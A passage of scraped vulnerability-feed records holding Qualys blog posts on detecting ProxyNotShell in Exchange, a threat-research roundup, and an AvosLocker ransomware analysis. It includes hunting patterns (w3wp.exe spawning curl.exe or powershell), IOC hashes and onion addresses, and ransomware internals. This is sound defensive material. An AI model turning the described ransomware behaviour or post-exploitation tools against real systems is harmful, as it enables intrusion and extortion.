September 29, 2022, active attacks against Microsoft Exchange were reported by Vietnamese cybersecurity company GTSC. The researcher at GTSC reported two critical vulnerabilities (now named \u201cProxyNotShell\u201d) in Microsoft Exchange Server via two advisories issued by [Zero Day Initiative](<https://www.zerodayinitiative.com/advisories/upcoming/>): [ZDI-CAN-18333](<https://www.zerodayinitiative.com/advisories/upcoming/#:~:text=by%3A%20Marcin%20Wiazowski-,ZDI%2DCAN%2D18333,-Microsoft>) and [ZDI-CAN-18802](<https://www.zerodayinitiative.com/advisories/upcoming/#:~:text=Zero%20Day%20Initiative-,ZDI%2DCAN%2D18802,-Microsoft>).\n\nThe first flaw (CVE-2022-41040) is a Server-Side Request Forgery (SSRF) vulnerability. The second flaw (CVE-2022-41082) allows remote code execution (RCE) when PowerShell is accessible to the attacker. Microsoft mentions that authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either of the two vulnerabilities. \n\nOn September 30, 2022, Microsoft released an [advisory](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) acknowledging that they are _\u201caware of limited targeted attacks using the two vulnerabilities to get into users\u2019 systems.\u201d_\n\nThreat actors are chaining these two zero-day vulnerabilities to deploy Chinese Chopper web shells on vulnerable Microsoft Exchange Servers for persistence and data theft. Based on the code on these web shells, GTSC suspects that these threat actors are based in China. 
As a result, CISA has added these vulnerabilities to its list of [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\nThese vulnerabilities affect the following versions of Exchange Server:\n\n * Exchange Server 2013\n * Exchange Server 2016\n * Exchange Server 2019\n\n## Qualys Vulnerability Coverage (QID)\n\nQualys customers can use the following QID to identify potentially vulnerable assets in their environments.\n\n**QID**| **Title**| **Release Versions** \n---|---|--- \n50122| Microsoft Exchange Server Multiple Vulnerabilities (Zero Day)| VULNSIGS-2.5.596-5 or later and QAGENT-SIGNATURE-SET-2.5.596.5-4 or later \n \n## Detect ProxyNotShell Using Qualys VMDR\n\nHere are the steps that your organization can take to rapidly respond to the zero-day threat of ProxyNotShell using Qualys VMDR.\n\n### Identify Microsoft Exchange Server Assets\n\nThe first step in managing these critical vulnerabilities and reducing risk is identification of your potentially vulnerable assets. [Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) makes it easy to identify Windows Exchange Server systems.\n\nUse the following Qualys Query Language (QQL) string:\n\n_operatingSystem.category:Server and operatingSystem.category1:`Windows` and software:(name:Microsoft Exchange Server)_\n\nQualys CSAM displays inventory of all Microsoft Exchange Server assets\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, for example: \u201cProxyNotShell Exchange Server 0-day\u201d. This helps in automatically grouping existing hosts with the zero-days as well as any new Windows Exchange Server that is provisioned in your environment. 
Tagging makes these grouped assets available for querying, reporting, and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).\n\nUsing the VMDR Dashboard, you can track \u2018Exchange 0-day\u2019, impacted hosts, their status, and overall management in real time. With trending enabled for dashboard widgets, you can keep track of the vulnerability trends in your environment using the Exchange Server 0-Day Dashboard.\n\n**Read the Article (Qualys Customer Portal)**: [ProxyNotShell Exchange Server 0-Day Dashboard | Critical Global View](<https://success.qualys.com/support/s/article/000006994>)\n\n Exchange Server 0-Day Dashboard in Qualys VMDR\n\n### Discover ProxyNotShell Exchange Server Zero-Day Vulnerabilities\n\nNow that hosts running Microsoft Exchange Server are identified, you will want to detect which of these assets are flagged with this vulnerability. VMDR automatically detects new vulnerabilities like these based on the always up-to-date Qualys KnowledgeBase (KB).\n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018Exchange Server 0-day\u2019 asset tag in the vulnerabilities view by using this QQL query:\n\n_VMDR query: vulnerabilities.vulnerability.qid: 50122_\n\nQualys VMDR isolates all Exchange Server assets with the vulnerability QID 50122\n\nQID 50122 is available in signature version VULNSIGS-2.5.596-5 and above. 
It can be detected using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version 2.5.596.5-4 and above.\n\n## Microsoft Guidance for Risk Mitigation of ProxyNotShell****\n\nMicrosoft has released [Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server [msrc-blog.microsoft.com]](<https://urldefense.com/v3/__https:/msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/__;!!Pw1rFClp!uMi4DoMkOqqFrUWPAWLwADPST1cL7Me88BZ3s_42Deankj3Bhue8qpgtSpj5hBv8jRjKOAsQe0cLPztgFzi-Eeyr$>). According to the blog post, \u201cMicrosoft is aware of limited targeted attacks using the two vulnerabilities to get into users\u2019 systems.\u201d The two vulnerabilities are CVE-2022-41040 and CVE-2022-41082, affecting on-premises Microsoft Exchange Server 2013, 2016, and 2019.\n\nNote: Microsoft Exchange Online is not affected. \n\nAn attacker could exploit these vulnerabilities to take control of an affected system.\n\n### Remediation/Mitigation of ProxyNotShell\n\n[Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) and [Qualys Custom Assessment and Remediation](<https://www.qualys.com/apps/custom-assessment-remediation/>) (CAR) customers can leverage the scripting capabilities of both products to deploy mitigation actions to their Exchange Servers.\n\nBy leveraging Qualys CAR\u2019s scripting capabilities or Patch Management's pre-actions capabilities, customers can deploy a PowerShell script to apply the mitigations recommended by Microsoft.\n\nRefer to the Qualys scripting library on GitHub for [the mitigation script](<https://github.com/Qualys/Custom-Assessment-and-Remediation-Script-Library/tree/main/Zero%20Day/CVE-2022-41040%2C41082\\(ProxyNotShell%20Microsoft%20Exchange%20Server\\)>) and execute it via Qualys CAR on required assets.\n\nAs per the mitigation introduced by MS, Qualys Policy Compliance customers can 
evaluate mitigation on MS Exchange targets with control:\n\n**24782 Status of the 'URL Rewrite Instructions' configured for the site and applications**\n\n**24802 Status of the 'Remote PowerShell access' setting enabled for users**\n\n## Detect Malicious Behavior related to ProxyNotShell using Qualys Multi-Vector EDR\n\nBased on the post-exploitation activity from multiple threat actors, [Qualys Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>) customers can hunt for the following malicious activities: \n\n 1. Detecting unusual child processes of w3wp.exe, such as: \n * csc.exe \n * transcodingservice.exe \n * werfault.exe \n * powershell \n * powershell_ise \n * python \n * curl.exe \n 2. Detecting webshell-like files with the following extensions being written on an Exchange Server: \n * .ashx \n * .aspx \n * .asmx \n * .asax \n\n## Detect Exploitation Attempts related to ProxyNotShell using Qualys Context XDR \n\nInterested [Qualys Context XDR](<https://www.qualys.com/apps/extended-detection-response/>) customers can contact their Technical Account Managers for the following rules: \n\n 1. T1190 - [Akamai WAF] ProxyNotShell RCE Vulnerability Exploitation Detected (CVE-2022-41040/CVE-2022-41082) \n 2. T1190 - ProxyNotShell RCE Vulnerability Exploitation Detected (CVE-2022-41040/CVE-2022-41082) \n 3. T1190 - [Trend Micro TippingPoint IPS] ProxyNotShell RCE Vulnerability Exploitation Detected \n 4. T1190 - ProxyNotShell RCE Vulnerability Exploitation Detected via Firewall (CVE-2022-41040/CVE-2022-41082) \n\nWith Qualys Context XDR, customers have the power to write their own detections as well. 
An example of a generic rule that detects ProxyNotShell attempts is shown below: \n\n\n\n## Indicators of Compromise (IOCs) for ProxyNotShell\n\n**Filenames**| **SHA256 Hash**| **Path** \n---|---|--- \nPxh4HG1v.ashx| c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1| %ProgramFiles%\\Microsoft\\ExchangeServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \nRedirSuiteServiceProxy.aspx| 65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5| %ProgramFiles%\\Microsoft\\ExchangeServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \nRedirSuiteServiceProxy.aspx| b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca| %ProgramFiles%\\Microsoft\\ExchangeServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \nxml.ashx| c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1| \nerrorEE.aspx| be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257| %ProgramFiles%\\Microsoft\\ExchangeServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \nDll.dll| 074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82| \nDll.dll| 45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9| \nDll.dll| 9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0| \nDll.dll| 29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3| \nDll.dll| C8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2| \n180000000.dll| 76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e| \n \n## Contributors\n\n * [Bharat Jogi](<https://blog.qualys.com/author/bharat_jogi>), Director, Vulnerability and Threat Research, Qualys\n * [Mehul Revankar](<https://blog.qualys.com/author/mRevankar>), VP, Product Management & Engineering for VMDR, Qualys\n * [Mayuresh Dani](<https://blog.qualys.com/author/mayuresh>), Manager, Threat Research, Qualys\n * [Lavish Jhamb](<https://blog.qualys.com/author/ljhamb>), Solution Architect, Compliance Solutions, Qualys\n * [Eran Livne](<https://blog.qualys.com/author/elivne>), Senior Director, Endpoint Remediation, 
Qualys\n * Mukesh Choudhary, Compliance Research Analyst, Qualys\n * Mohd Anas Khan, Compliance Research Analyst, Qualys\n * Arun Pratap Singh, Engineer, Threat Research, Qualys\n * David Lu, Senior Engineer, Threat Research, Qualys\n * Felix Jimenez Saez, Director, Product Management. Qualys", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T23:25:55", "type": "qualysblog", "title": "Qualys Response to ProxyNotShell Microsoft Exchange Server Zero-Day Threat Using Qualys Cloud Platform", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T23:25:55", "id": "QUALYSBLOG:89B0E9C4C12FFA944639C5B7B34594DB", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-28T04:05:53", "description": "Welcome to the third edition of the Qualys Research Team\u2019s \u201cThreat Research Thursday\u201d, where we collect and curate notable new tools, techniques, procedures, threat intelligence, cybersecurity news, malware attacks, and more. Feedback on our second edition, [Qualys Threat Research Thursday](<https://blog.qualys.com/vulnerabilities-threat-research/2022/09/29/qualys-threat-research-thursday>), is more than welcome. We would love to hear from you! 
\n\n\n\n## From the Qualys Blog \n\nHere is a roundup of the most interesting blogs from the Qualys Research Team over the past couple of weeks: \n\n * [Qualys Response to ProxyNotShell Microsoft Exchange Server Zero-Day Threat Using Qualys Cloud Platform](<https://blog.qualys.com/vulnerabilities-threat-research/2022/09/30/qualys-response-to-proxynotshell-microsoft-exchange-server-zero-day-threat-using-qualys-platform>) \u2013 How do you detect the ProxyNotShell vulnerability that was released a month ago? This blog talks about all of this and more. Definitely worth a look since no official patches are available as of today! \n * [Leeloo Multipath: Authorization bypass and symlink attack in multipathd (CVE-2022-41974 and CVE-2022-41973)](<https://blog.qualys.com/vulnerabilities-threat-research/2022/10/25/leeloo-multipath-authorization-bypass-and-symlink-attack-in-multipathd-cve-2022-41974-and-cve-2022-41973>) \u2013 Fresh from the Qualys Research Team! Read more about our indigenous research in discovering these vulnerabilities affecting the `multipathd` daemon.\n * [Text4Shell: Detect, Prioritize and Remediate The Risk Across On-premise, Cloud, Container Environment Using Qualys Platform](<https://blog.qualys.com/vulnerabilities-threat-research/2022/10/27/text4shell-detect-prioritize-and-remediate-the-risk-across-on-premise-cloud-container-environment-using-qualys-platform>) - All the details for detecting, prioritizing and remediating the Text4Shell vulnerability can be found in this post.\n\n## New Tools & Techniques \n\n**ScubaGear** \u2013 This assessment tool was developed by CISA. It verifies that an M365 tenant\u2019s configuration conforms to the policies described in the SCuBA Minimum Viable Secure Configuration Baseline documents. 
Currently, available baseline documents cater to Hybrid Azure Active Directory (AD), Microsoft 365 Defender, Microsoft Exchange Online, OneDrive for Business, Power BI, the Microsoft Power Platform, SharePoint Online and Microsoft Teams. ScubaGear v0.1.0 source can be [found on GitHub](<https://github.com/cisagov/ScubaGear>). \n\n**RustHound** \u2013 This cross-platform active directory collector for BloodHound is written in Rust. It will work on Linux, Windows, or MacOS. Though not all features from SharpHound are implemented yet, it is worthwhile to get this into our detection engineering cycles so that effective detections can be developed. [Check out the GitHub project](<https://github.com/OPENCYBER-FR/RustHound>). \n\n**WinDbg** \u2013 I know, I know! WinDbg is old. But the latest version of the WinDbg Preview debugger is now available with regex search and restricted mode support. [Check out WinDbg 1.2107.13001.0](<https://apps.microsoft.com/store/detail/windbg-preview/9PGJGD53TN86>). \n\n**Sysmon - **This release fixes and adds a new Windows Event ID 28 for FileBlockShredding, which is generated when Sysmon detects and blocks file shredding from tools such as SDelete. [Download Sysmon v14.1](<https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon>). \n\n**SockFuzzer \u2013 **This is an all-in-one network syscall fuzzer for XNU. It helps you fuzz the network stack on macOS and Linux-based hosts in userland. Check [it out here](<https://github.com/googleprojectzero/SockFuzzer>). \n\n**SharpEfsPotato** - This is a neat demonstration of local privilege escalation from SeImpersonatePrivilege using Encrypting File System Remote (EFSRPC) Protocol. This combines two different projects - SweetPotato and SharpSystemTriggers/SharpEfsTrigger. Read more on [SharpEfsPotato](<https://github.com/bugch3ck/SharpEfsPotato>). 
\n\n**TokenMan** \u2013 This new and open-source token manipulation tool will help you in post-exploitation activities when working with Azure Active Directory \u2013 especially useful when you have a Family of Client ID (FOCI) access. Download [the tool here](<https://github.com/secureworks/TokenMan>). \n\n## New Vulnerabilities\n\n**CVE-2022-41040, CVE-2022-41082** \u2013 aka ProxyNotShell! Mitigations are available for these 0day vulnerabilities. They apply to Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019. Limited, targeted attacks are still being seen in the wild for these server-side request forgery (SSRF) and remote code execution (RCE) vulnerabilities. Read more on the [Microsoft Customer Guidance](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) page. Qualys customers can scan for QID 50122 and find vulnerable and unpatched Microsoft Exchange systems in their environment. \n\n**CVE-2022-41352 **\u2013 This publicly exploited vulnerability affecting Zimbra Collaboration (ZCS) 8.8.15 and 9.0, allows a remote attacker to gain incorrect access to any other user accounts. Qualys VMDR customers can keep a look out for QID 377618 in their reports and identify vulnerable installations. It is recommended that affected customers update to ZCS 9.0.0 Patch 27 or ZCS 8.8.15 Patch 34. More information about this can be [found here](<https://wiki.zimbra.com/wiki/Security_Center>). \n\n**CVE-2022-40684 \u2013 **This Fortinet authentication bypass vulnerability allows threat attackers to log in as an administrator on affected FortiOS, FortiProxy, and FortiSwitchManager products. A simple HTTP packet to the administrative interface is enough to compromise an affected device. Qualys VMDR and WAS QIDS - 150585, 730623, 43921 should get you started with finding vulnerable systems in your environment. 
Follow it up by patching up the vulnerability as mentioned in this [vendor-published advisory](<https://www.fortiguard.com/psirt/FG-IR-22-377>). Reminder \u2013 a PoC exploiting this vulnerability is already out in the wild. \n\n## Noteworthy Mentions \n\nQualys Threat Research Team contributed to the October 25, 2022 release of **MITRE ATT&CK v12**! Our contribution from [Defending Against Scheduled Task Attacks in Windows Environments](<https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments>) was cited under [T1053.005](<https://attack.mitre.org/techniques/T1053/005/>). This release introduces \u201cCampaigns\u201d, where adversary activity conducted over a specific period on common targets are grouped together. This version of ATT&CK for Enterprise contains 14 Tactics, 193 Techniques, 401 Sub-techniques, 135 Groups, 14 Campaigns, and 718 Pieces of Software. [Read more here](<https://attack.mitre.org/resources/updates/updates-october-2022/>). \n\nWe also contributed to the awesome and open-source **Atomic Red Team** framework. Examples are [Atomic Test #22 - Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key](<https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md#atomic-test-22---disable-uac-admin-consent-prompt-via-consentpromptbehavioradmin-registry-key>) and [Atomic Test #2 - Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message](<https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md#atomic-test-2---configure-legalnoticecaption-and-legalnoticetext-registry-keys-to-display-ransom-message>) by our Senior Engineer, Threat Research - [Harshal](<https://blog.qualys.com/author/htupsamudre>). 
\n\n## Threat Thursdays Webinar \n\nIf you missed last month's [Threat Thursday](<https://event.on24.com/wcc/r/3925198/52A4000CBD17D2B16AFD5F56B3C9D15A>) monthly webinar, where the Qualys Threat Research Team presented an in-depth analysis of AsyncRAT, you can watch it on demand at the link below. \n\n[Watch Now](<https://gateway.on24.com/wcc/eh/3347108/lp/3987473/qualys_research_team_threat_thursdays_october_2022/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-28T00:58:53", "type": "qualysblog", "title": "Qualys Research Team: Threat Thursdays, October 2022", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-40684", "CVE-2022-41040", "CVE-2022-41082", "CVE-2022-41352", "CVE-2022-41973", "CVE-2022-41974"], "modified": "2022-10-28T00:58:53", "id": "QUALYSBLOG:69FF0F583C65CD2D1EB59914BE41A705", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-07T05:27:25", "description": "_AvosLocker is a ransomware group that was identified in 2021, specifically targeting Windows machines. Now a new variant of AvosLocker malware is also targeting Linux environments. In this blog, we examine the behavior of these two AvosLocker ransomware variants in detail._\n\nAvosLocker is a relatively new ransomware-as-a-service that was first spotted in late June 2021. The attackers use spam email campaigns as initial infection vectors for the delivery of the ransomware payload. During the encryption process, files are appended with the ".avos" extension. An updated variant appends the extension ".avos2". 
Similarly, the Linux version appends the extension ".avoslinux".\n\nAfter every successful attack, the AvosLocker gang releases the names of their victims on the Dark Leak website hosted on the TOR network and provides exfiltrated data for sale. URL structure: `hxxp://avosxxx\u2026xxx[.]onion`\n\nThe AvosLocker gang also advertises their latest ransomware variants on the Dark Leak website. URL structure: `hxxp://avosjonxxx\u2026xxx[.]onion`\n\nThe gang has claimed, \u201cThe AvosLocker's latest Windows variant is one of the fastest in the market with highly scalable threading and selective ciphers.\u201d They offer an affiliate program that provides ransomware-as-a-service (RaaS) for potential partners in crime.\n\nRecently they have added support for encrypting Linux systems, specifically targeting VMware ESXi virtual machines. This allows the gang to target a wider range of organizations. It also possesses the ability to kill ESXi VMs, making it particularly nasty.\n\nAccording to [deepweb research](<https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/>) by Cyble Research Labs, the threat actors behind the AvosLocker ransomware group are exploiting Microsoft Exchange Server vulnerabilities using ProxyShell to compromise the victim\u2019s network.\n\nCVEs involved in these exploits are CVE-2021-34473, CVE-2021-31206, CVE-2021-34523, and CVE-2021-31207.\n\n### Technical Analysis of AvosLocker Windows Variant\n\n#### Command-Line Options\n\nThe following figure shows a sample of the command-line options.\n\nFig. 1: Command Line Option\n\nThe available options allow for control over items like enabling/disabling SMB brute force, mutex creation, or the number of concurrent threads. \nIf no options are given, the malware runs with default options as shown in figure 2, where it ignores encryption of network drives and SMB shares. It runs 200 concurrent threads of its file encryption routine.\n\nFig. 
2: Execution with Default Parameter\n\nDuring execution, the malware console displays detailed information about its progress on the screen (fig. 3).\n\nFig. 3: Progress Details\n\nMost of the strings in the malware are kept in XOR-encrypted form. The decryption routines are similar; only the registers and keys differ (fig. 4). Strings are decrypted just before their use.\n\nFig. 4: Commonly Used Decryption Routine\n\nInitially, the malware collects the command-line options provided while launching the application (fig. 5).\n\nFig. 5: Get command-line Options\n\nThen it decrypts the mutex name \u201cCheic0WaZie6zeiy\u201d and checks whether it is already running, to avoid multiple instances (fig. 6).\n\nFig. 6: Mutex Creation\n\nAs shown in figure 7, AvosLocker uses multi-threaded tactics. It calls the APIs below to create multiple worker threads and share file paths among them, making efficient use of multi-core CPUs.\n\nAPIs called:\n\n * CreateIoCompletionPort()\n * PostQueuedCompletionStatus()\n * GetQueuedCompletionStatus()\n\nFig. 7: Use of CreateIoCompletionPort\n\nThe code creates multiple threads in a loop (fig. 8). The threads are set to the highest priority for encrypting data quickly.\n\nFig. 8: Create Thread In-Loop and Set Priority\n\nAvosLocker ransomware performs a recursive sweep through the file system (fig. 9), searches for attached drives, and enumerates network resources using the APIs WNetOpenEnum() and WNetEnumResource().\n\nFig. 9: Search Network Share\n\nBefore selecting a file for encryption, it checks the file attributes and skips the file if \u201c**FILE_ATTRIBUTE_HIDDEN**\u201d or \u201c**FILE_ATTRIBUTE_SYSTEM**\u201d is set, as shown in figure 10.\n\nFig. 10: Check File Attribute\n\nOnce the file attribute check is passed, it performs the file extension check. It skips a file from encryption if its extension matches one of the extensions shown in figure 11.\n\nFig. 
11: Skip Extension List\n\nIt also contains the list of files and folders that need to be skipped from the encryption (fig. 12).\n\nFig. 12: Skip File Folder List\n\nAvosLocker uses RSA encryption, and it comes with a fixed hardcoded ID and RSA Public Key of the attacker (fig. 13).\n\nFig. 13: Hardcoded Public Key\n\nAfter file encryption using RSA, it uses the ChaCha20 algorithm to encrypt encryption-related information (fig. 14).\n\nFig. 14: Use of ChaCha20\n\nIt appends this encryption-related information (fig. 15) at the end of the file in Base64-encoded format.\n\nFig.15: Encryption Related Information\n\nThen it appends the "avos2" extension to the file using MoveFileWithProgressW (fig. 16).\n\nFig. 16: Add Extension Using Move File\n\nAs seen in figure 17, it has appended the "avos2" extension.\n\nFig. 17: File with Updated Extension\n\nIt writes a ransom note (fig. 18) named \u201cGET_YOUR_FILES_BACK.txt\u201d to each encrypted directory before encrypting the files in it.\n\nFig. 18: Ransom Note\n\nThe ransom note instructs the user not to shut down the system while encryption is in progress, to avoid file corruption. It asks the victim to visit the onion address with the TOR browser to pay the ransom and to obtain the decryption key and decryption application.\n\n#### AvosLocker Payment System\n\nAfter submitting the "ID" mentioned on the ransom note to AvosLocker's website (fig. 19), the victim will be redirected to the "payment" page.\n\nFig. 19: AvosLocker's Website\n\nIf the victim fails to pay the ransom, the attacker then puts the victim\u2019s data up for sale. Figure 20 shows the list of victims (redacted for obvious reasons) mentioned on the site.\n\nFig. 20: List of Victims\n\nAvosLocker also offers an affiliate program that provides ransomware-as-a-service (RaaS). 
They provide \u201chelpful\u201d services to clients such as:\n\n * Supports Windows, Linux & ESXi.\n * Affiliate panel\n * Negotiation panel with push & sound notifications\n * Assistance in negotiations\n * Consultations on operations\n * Automatic builds\n * Automatic decryption tests\n * Encryption of network resources\n * Killing of processes and services with open handles to files\n * Highly configurable builds\n * Removal of shadow copies\n * Data storage\n * DDoS attacks\n * Calling services\n * Diverse network of penetration testers, access brokers and other contacts\n\nFig. 21: Partnership Program\n\n### Technical Analysis of AvosLocker Linux Variant\n\nIn this case, the AvosLocker malware arrives as an elf file. As shown in figure 22, the analyzed file is x64 based Linux executable file.\n\nFig. 22: File Details\n\nIt\u2019s a command-line application having some command-line options (fig. 23).\n\nFig. 23: Command-Line Options\n\nThe `<Thread count>` parameter as shown above represents the number of threads that can be created to encrypt files simultaneously. It possesses the capability to kill ESXi VMs based on the parameter provided while executing.\n\nUpon execution, the malware first collects information about the number of threads that need to be created. Then it checks for string \u201cvmfs\u201d in the file path provided as a command-line argument (fig. 24).\n\nFig. 24: Checks for \u201cvmfs\u201d\n\nAfter that, it also checks for string \u201cESXi\u201d in the file path provided as a command-line argument (fig. 25).\n\nFig. 25: Checks for \u201cESXi\u201d\n\nIf this parameter is found, then it calls a routine to kill the running ESXi virtual machine (fig. 26).\n\nFig. 26: Code to Kill ESXi Virtual Machine\n\nThe command used for killing the ESXi virtual machine is as shown in figure 27.\n\nFig. 27: Command to Kill Running ESXi Virtual Machine\n\nFurther, AvosLocker drops a ransom note file (fig. 28) at the targeted directory.\n\nFig. 
28: Create ransom note\n\nAfter that, it starts creating a list of files that must be encrypted. Before adding a file path to the list, it checks whether it is a regular file or not (fig. 29). Only regular files are added to the encryption list.\n\nFig. 29: Checks File Info\n\nAvosLocker skips the ransom note file and any files with the extension \u201cavoslinux\u201d from adding into the encryption list (fig. 30).\n\nFig. 30: Skip \u201cavoslinux\u201d Extension File\n\nThen it calls the mutex lock/unlock API for thread synchronization as shown in figure 31.\n\nFig. 31: Lock-Unlock Mutex for Thread Synchronization\n\nBased on the number of threads specified, it creates concurrent CPU threads (fig. 32). This helps in encrypting different files simultaneously at a very fast speed.\n\nFig. 32: Create Threads in Loop\n\nAvosLocker\u2019s Linux variant makes use of Advanced Encryption Standard (AES) and elliptic-curve cryptography (ECC) algorithms for data encryption.\n\nFile-related information along with the encryption key used might be encrypted and then encoded with base 64 formats. This encoded information is added at the end of each encrypted file (fig. 33).\n\nFig. 33: File-related Info added at the end\n\nFigure 34 shows the malware appending the extension \u201c.avoslinux\u201d to the encrypted file names.\n\nFig. 34: Append file extension \u201c.avoslinux\u201d after encryption\n\nBefore starting file encryption, it creates a ransom note named \u201cREADME_FOR_RESTORE \u201c. The content of this ransom note is shown in figure 35.\n\nFig. 35: Ransom Note\n\nThe ransom note instructs the victim not to shut down the system in case encryption is in progress to avoid file corruption. 
It asks the victim to visit the onion address with a TOR browser to pay the ransom and to obtain the decryption key and decryption application.\n\n### Indicators of Compromise (IOCs):\n \n \n Windows: C0A42741EEF72991D9D0EE8B6C0531FC19151457A8B59BDCF7B6373D1FE56E02\n \n \n Linux: 7C935DCD672C4854495F41008120288E8E1C144089F1F06A23BD0A0F52A544B1\n \n \n URL:\n hxxp://avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad[.]onion.\n hxxp://avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad[.]onion\n\n### TTP Map:\n\nInitial Access| Execution| Defense Evasion| Discovery| Impact \n---|---|---|---|--- \nPhishing (T1566)| User Execution (T1204)| Obfuscated Files or Information (T1027)| System Information Discovery (T1082)| Data Encrypted for Impact (T1486) \n| | | File and Directory Discovery (T1083)| Inhibit System Recovery (T1490)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-07T05:18:46", "type": "qualysblog", "title": "AvosLocker Ransomware Behavior Examined on Windows & Linux", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31206", "CVE-2021-31207", 
"CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-07T05:18:46", "id": "QUALYSBLOG:DC0F3E59C4DA6EB885E6BCAB292BCA7D", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-09-16T11:21:49", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at January 10, 2023 2:58pm UTC reported:\n\nCVE-2022-41082, also known as ProxyNotShell is an authenticated RCE in Microsoft Exchange. ProxyNotShell actually combines CVE-2022-41082 and CVE-2022-41040 for the whole attack chain. This CVE specifically however is the RCE component. The vulnerability is a deserialization flaw in Microsoft Exchange\u2019s PSRP backend. The PSRP backend can be accessed by an authenticated attacker leveraging the SSRF flaw identified as CVE-2022-41040. The deserialization gadget was documented by ZDI in their [blog](<https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend>). While this vulnerability affected Exchange Server 2013 and Exchange Server 2016, the gadget chain only worked with 